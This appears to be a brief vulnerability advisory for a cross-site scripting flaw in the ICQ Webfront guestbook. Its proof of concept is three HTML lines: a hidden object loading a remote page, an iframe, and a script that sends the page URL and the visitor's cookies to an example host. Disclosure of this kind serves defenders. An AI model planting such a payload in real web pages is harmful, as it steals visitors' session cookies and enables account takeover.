• info
• discussion
• exploit
• solution
• references

ICQ Webfront guestbook Cross-Site Scripting Vulnerability

The following proof of concept was provided:

<object style="display:none" data="http://www.example.com/bad.asp"></object>
<SCRIPT>location.href="http://www.example.com/xss.cgi?ref="+document.URL+"cookie="+document.cookie;</script>
<iframe src="http://www.example.com"></iframe>